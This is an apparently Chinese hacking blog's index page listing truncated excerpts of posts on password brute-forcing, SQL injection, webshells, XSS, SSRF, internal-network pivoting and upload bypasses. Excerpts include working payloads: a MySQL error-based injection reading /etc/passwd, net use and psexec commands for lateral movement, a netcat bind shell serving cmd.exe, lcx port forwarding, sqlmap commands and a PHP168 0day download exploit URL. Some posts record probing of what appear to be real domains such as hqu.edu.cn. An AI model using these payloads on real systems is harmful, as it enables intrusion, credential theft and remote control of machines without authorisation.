Jim的博客

原创 密码及口令爆破

1.MSSQL Server口令破解工具使用  Target：192.168.1.1 Protocol：MSSQL  Port：1433   User：sa Dictionary：C：\pass.txt  点击start2.FTP口令破解  Target：192.168.1.1 Protocol：FTP  Port：21   User：ftpuser Dictionary：C：\pass.tx

原创 密码爆破

原创 命令执行漏洞

转载 网站入侵一般流程

1、信息收集1.1/ Whois信息--注册人、电话、邮箱、DNS、地址1.2/ Googlehack--敏感目录、敏感文件、更多信息收集1.3/ 服务器IP--Nmap扫描、端口对应的服务、C段1.4/ 旁注--Bing查询、脚本工具1.5/ 如果遇到CDN--Cloudflare（绕过）、从子域入手（mail，postfix）、DNS传送域漏洞1

转载 一次通过漏洞挖掘成功渗透某网站的过程

寻找突破口对方主站是一个定制开发的CMS，在进行一系列扫描和分析之后，未发现可利用的地方，于是开始分析其二级域名，发现其中某资源管理分站，目标操作系统linux，仅开放HTTP（80端口），整站程序为ResourceSpace，一个开源php建站程序。漏洞挖掘因为是开源程序，考虑其漏洞挖掘相对容易一些，于是决定把这个网站作为突破口。于是到resourcespace的官方网站

原创 内网渗透技巧

一.获取了账号和密码1.获取了账号和密码，进行内网碰撞net use \\192.168.1.1\c$ "123" "123"2.获取了账号和密码，进行内网验证net use \\192.168.1.1\ipc$ "123" /user:"123"3.获取了账号和密码，获取cmdshellpsexec \\192.168.1.1 -u 123 -p 123 cmd二.扫

转载 PHP168整站系统0DAY漏洞预警

下载 mysql_config.php 和 adminlogin_logs.php 两个文件到本地。http://dabei.org//job.php?job=download&url="aHR0cDovL2RhYmVpLm9yZy8vY2FjaGUvYWRtaW5sb2dpbl9sb2dzLnBocA=="http://dabei.org//job.php?job=download&ur

原创 mysql报错大法

mysql常用的注入用法：利用rand&groupby报错大法and (select 1 from (select count(*),concat(floor(rand(0)*2),substring(load_file('/etc/passwd'),0,5))a from information_schema.tables group by a)b) and

原创 文件包含漏洞利用

原创 Access注入

1.判断数据库类型id=1 and (select count(*) from sysobjects)>02.判断注入点id=1 and 1=1 id=1 and 1=23.判断列数

原创 mssql注入

原创 MSSQL注入

MSSQL常规注入MSSQL基于报错的盲注入MSSQL基于时间差的盲注入消息头注入

原创 抓包工具+Access注入

GET注入，POST注入，Cookie注入，消息头注入数字型注入字符型注入搜索型注入联合查询注入报错型注入盲注入（基于时间型盲注，基于逻辑错误）切记：access没有注释符注意：union select 后门一定要跟from表名，而只能靠猜表名注意：Access只能靠猜，所以

原创 信息收集

主动信息收集：1.端口扫描：-sT, -sU,-Pn,-p,-sV,-O -v 详细信息-A 系统版本，服务信息等 -T设置时间模板，比如 -T 42.web脚本扫描3.系统及第三方中间件扫描被动信息收集：1.Google hacking技术，比如网站后台地址，二级域名2.whois查询3.IP定位，旁注查询

原创 Asp大马介绍

最近草泥马这款最新版的Asp大马很热门，主流大马的提权功能,信息收集功能,以及木马隐藏功能都十分不错。"星外主机提权"、“华众主机提权”、“N点主机提权”、“新网主机提权”

原创 ASP+Access注入

空格20改为00截断

原创 使用nc获取cmdshell

NetCat简称nc正向连接的方式就是在目标主机上绑定一个端口，当有客户端连接过来的时候就把该连接请求转向cmd.exe来处理，从而客户端获取一个类型命令提示符的执行环境执行命令：CMD路径：c:\windows\system32\cmd.exe1.语句：\c D:\wwwroot\case1\nc.exe -l -p 8888 -t -e cmd.exe2.客户端直接使用te

原创 暗月mysql全版本通杀提权神器使用教程&工具

原创 Mysql注入上传木马提权

上传暗月大马

原创 SQL注入整合

Access数据库注入：1.Access数据库联合查询方式注入判断表名：?id=1 and (select count(*) from admin)>0和?id=1 and exists(select * from admin)>0的任意一种方法判断列名：?id=1 and exists(select username from admin)判断当前表的字段数：?id=

原创 Lcx端口转发和映射

连接内网服务器的3389：1.确定被控制计算机的内网ip2.被控制的计算机执行：lcx -slave 本地ip 51 被控制计算机ip 33893.本地执行：lcx -listen 51 100004.用mstsc链接：127.0.0.1:10000

原创 FCKeditor编辑器上传漏洞

使用burpsuite上传几次发现解析错误，检测发现type=File将type=Image，00截断成功

原创 测试网站：http://001.lostcity.com

测试网站：http://001.lostcity.com1、sql注入寻找注入点，并用工具渗透，找到admin用户和密码2、扫描后台，找到后台登陆地址，起始地址：http://001.lostcity.com用御剑扫描3、用1、2扫描到的密码及地址，登陆后台4、进入后台，发现上传文件的地方，尝试上传一句话木马，但上传失败

原创 SQLMAP

Sqlmap命令注入MySQL数据库查看是否存在SQL注入python sqlmap.py –u "http://192.168.154.132/dvwa/sqli/?id=134" --cookie='security=low'探测数据库名称python sqlmap.py –u "http://192.168.154.132/dvwa/sqli/?id=134" --dbs

原创 zend studio安装教程

原创 hqu.edu.cn域名测试

信息收集：获得域名IP：218.193.82.10测试域名开启25,110,8080端口，邮箱发送协议SMTP,邮箱接收协议POP3,Tomcat采用nmap进行端口扫描：操作系统识别：Linux2.6.18-2.6.22之间网站敏感目录查找：http://www.hqu.edu.cn/index.htmhttp://www.hqu.edu.cn

转载 SSRF漏洞

SSRF漏洞的寻找（漏洞常见出没位置）：1）分享：通过URL地址分享网页内容2）转码服务3）在线翻译4）图片加载与下载：通过URL地址加载或下载图片5）图片、文章收藏功能6）未公开的api实现以及其他调用URL的功能7）从URL关键字中寻找　　sharewapurllinksrcsour

转载 WordPress-Mailpress插件远程代码执行漏洞

漏洞利用：subject=

原创 xss攻击

1.简单的反射型XSS输入：alert('hello')2.存储型XSS管理员登录后台，触发xss

原创 漏洞挖掘-混浠的代码

1.浏览器的进制常识浏览器中常用的进制有二进制Binary，十进制Octal和十六进制HexHTML的属性中用到十进制和十六进制CSS的属性中用到十进制和十六进制JavaScript有八进制和十六进制2.浏览器的编码常识HTMLEncode函数URLEncode函数escape/unescape函数3.HTML中的代码注入技巧3.1标签3.2属性3.

原创 漏洞挖掘

alert() 弹出个提示框 （确定） confirm() 弹出个确认框 （确定，取消） prompt() 弹出个输入框 让你输入东西

原创 phpcms安装教程

phpcms非常适合用来建立资讯类网站，比如政府、高校、行业门户和地区门户等新闻资讯。文章支持图文混排，可插入图片、flash和其他多媒体文件，也可上传附件。phpcms可安装到企业内网上用来做内部资料库，也可以通过phpcms数据提取功能与其他系统协同工作，比如OA系统、采集器。

转载 preg_replace引发的phpmyadmin(4.3.0-4.6.2)命令执行漏洞

漏洞利用思路：这个漏洞目前没法直接利用，因为有token限制，需要登陆抓到token，同时需要构造第三个参数保证和第一个参数匹配上，第一个参数可控，但是第三个参数是从数据库中取出的，所以只能提前插入到数据库中，然后再取出来，columnIndex是取出字段值的可控，所以第三个参数也可控了。//$find = ’0/e’;//$fromsqldata = ’0/e’;//echo pre

原创 wordpress存储型XSS

使用style，将这个标签区域放大，适合触发。1.使用style，将标签区域放大，适合触发2.使用其他事件，无需用户交互，直接触发在任意标签上加tabindex即可让这个标签可以被TAB选中，于是就有了onfocus事件。然后访问#a即可触发

原创 AWVS使用教程

工具分为 4大块。简要概述我们最相关的3部分 1) web scanner： 扫描器，默认情况产生10个线程的爬虫 2) 工具箱： 集成很多好用的工具，比如 http fuzzer 3) 配置： 呵呵，只要懂英文就看得明白 1.点击new scan，启动扫描注意：可以设置扫描重点，默认15种配置如下：扫描结果分析

原创 FineCMS1.7.9版本网站渗透

虚拟机输入：http://10.4.4.90/finecms/index.php?s=admin&c=login登陆网站后台：admin/admin

原创 FineCMS安装教程

FineCMS（简称FC）是一款基于PHP+MySql开发的中小型内容管理系统，采用MVC设计模式实现业务逻辑与表现层的适当分离，使网页设计师能够轻松设计出理想的模板， 插件化方式开发功能易用便于扩展，支持自定义内容模型和会员模型，并且可以自定义字段，可面向中小型站点提供重量级网站建设解决方案。目前有三个分支:1.x，2.x，5.x。FineCMS基本目录结构 ..../cache

原创 常见端口漏洞

Windows中可以通过Internet信息服务(IIS)来提供FTP连接和管理，也可以单独安装FTP服务器软件来实现FTP功能，比如常见的FTP Serv-U。

原创 AWVS安装教程

1.下载安装包和破解补丁2.解压和安装补丁双击补丁包，按PATH,一路next就OK了

原创 Win10虚拟机ping本地ip

1.设置成桥接模式2.手动设置ip地址3.查看ip4.ping本机地址注意：需要设置防火墙关闭防火墙或者设置入站规则